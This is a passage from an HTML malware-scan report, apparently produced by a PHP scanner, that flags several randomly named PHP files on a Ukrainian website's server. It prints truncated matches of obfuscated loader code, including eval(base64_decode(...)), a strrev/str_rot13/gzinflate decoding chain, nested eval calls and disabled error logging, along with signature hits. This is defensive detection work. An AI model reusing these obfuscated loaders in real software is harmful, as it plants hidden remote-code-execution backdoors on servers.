</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function str_rot13 exec_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RkRP</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 80e70adc <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 80e70adc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700"><?</span><span style="color: #0000BB">php<br /></span><span style="color: #007700">eval</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ldmFs</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">V2YW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_128").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/ovavscpkx.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.06 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 20:11:14</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 20:11:14</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_129" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSvuX0l+i/6Jm9xfGkJT3L4yTp5urFQ/jX0Q...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $LNuWx = '</span><span style="color: #0000BB">gzinflate</span><span style="color: #DD0000">'; $sJhXG = '</span><span style="color: #0000BB">str_rot13</span><span style="color: #DD0000">'; $Shgrt = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; echo '</span><span style="color: #007700"><</span><span style="color: #0000BB">br</span><span style="color: #007700">> </span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); eval($Shgrt($sJhXG($LNuWx($DesQW('</span><span style="color: #0000BB">rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf</span><span style="color: #007700">/</span><span style="color: #0000BB">h7yy8iIOHH</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$Shgrt</span><span style="color: #007700">(</span><span style="color: #0000BB">$sJhXG</span><span style="color: #007700">(</span><span style="color: #0000BB">$LNuWx</span><span style="color: #007700">(</span><span style="color: #0000BB">$DesQW</span><span style="color: #007700">(</span><span style="color: #DD0000">'rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSv...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function str_rot13 eval_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RinY</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_129").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/ppkbw.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 52.73 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:53:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:53:27</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_130" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwRtF3uTXMQDYJ2O8umyGtGsMsdkHxFjTSqmY1beQbJ7x0Ls9WyJ6ASK9QrEzGTf7IdPIPre8mqhI9eodyFMNj9YGRJDn4CcfJ2kg2eIoDbWPphXTbRPGymWPdoz2ZTpl06XQOtLLx7gsxvK3Irk9BTH1PqIsFBobKuAAvoc0SoCKu93DeTNctdZDxvZmgGsswABEIsOaUOsA2MUKfu9SxAH8JNoIXBOCmP6yV9cgTI617pcLxXozLLp4CBgY6DKMgckypa8MEWDrpi0uDksDJcp9nY1MVP05l9w4HNHAr3s0crA8C0jhvHHHTYlLPxeNcFoVSCkMXiWORKVrbYrMaYRShWQq0pJFhNkC7vDJ1G0TBv51pj82gTS...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strrev</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">$_xwynUOL</span><span style="color: #007700">(</span><span style="color: #0000BB">_6Zys</span><span style="color: #007700">(</span><span style="color: #0000BB">$_cCzFdr</span><span style="color: #007700">))));}eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(</span><span style="color: #0000BB">_r5Me0FNrh83UY9xZt</span><span style="color: #007700">(</span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwR</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2P</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function str_rot13 exec_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RkRP</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 80e70adc <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 80e70adc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700"><?</span><span style="color: #0000BB">php<br /></span><span style="color: #007700">eval</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ldmFs</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">V2YW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_130").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/yhmfq.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 70.78 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:17:23</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:17:23</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_131" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOExMemc3NS9...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5F</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">"; eval(</span><span style="color: #0000BB">$o</span><span style="color: #DD0000">("</span><span style="color: #0000BB">CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$o</span><span style="color: #007700">(</span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOEx...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">laVE</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev exec_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cExE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
